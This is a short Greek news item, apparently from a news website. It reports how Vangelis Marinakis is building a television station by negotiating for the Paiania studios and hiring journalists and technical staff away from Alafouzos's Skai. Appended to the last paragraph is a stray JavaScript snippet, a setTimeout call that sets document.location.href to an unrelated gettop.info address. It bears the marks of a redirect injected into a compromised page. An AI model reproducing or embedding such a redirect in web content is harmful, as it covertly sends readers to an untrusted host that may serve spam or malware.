Ο Μαρινάκης «πολιορκεί» τη μικρή περιοχή του Αλαφούζου

0
47

 

Με εντατικούς ρυθμούς προχωρά στο στήσιμο του τηλεοπτικού του σταθμού ο Βαγγέλης Μαρινάκης.

Ήδη, βρίσκεται σε προχωρημένες συζητήσεις με τον επιχειρηματία Νίνο Ελματζιόγλου, ιδιοκτήτη των ιστορικών στούντιο της Παιανίας -εκείνα από τα οποία έβγαιναν το ενημερωτικό και ψυχαγωγικό πρόγραμμα του Mega έως τα τέλη της δεκαετίας του ΄90.

Ο πρόεδρος του Ολυμπιακού κινείται και για την αγορά προγράμματος, ώστε το κανάλι του να είναι εξαρχής ανταγωνιστικό, ενώ έχει ήδη συζητήσει με τέσσερις γνωστούς δημοσιογράφους για το ενδεχόμενο να καλύψει τη θέση τού διευθυντή τού ενημερωτικού τομέα.

Στο τεχνικό κομμάτι έχει «χτυπήσει» τρία σημαντικά στελέχη, προερχόμενα από τον Σκάι.

Πληροφορίες αναφέρουν ότι εξασφάλισε και την σκηνοθέτι Βερενίκη Καραμανώλη, η οποία ήταν επικεφαλής του control room, στο κεντρικό δελτίο με τη Σία Κοσιώνη και το μεσημεριανό με την Εύα Αντωνοπούλου. Η σκηνοθέτις αποχώρησε από το Φάληρο μετά τον Δημήτρη Τσίγγο και τον Νίκο Τσιμούρη.

Άλλωστε η στενή συνεργάτις τού Βαγγέλη Μαρινάκη, Εύη Κουτσαυτάκη, προέρχεται από τον Όμιλο Αλαφούζου, στον οποίο εργάστηκε 20 ολόκληρα χρόνια ως στέλεχος πρώτης γραμμής. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here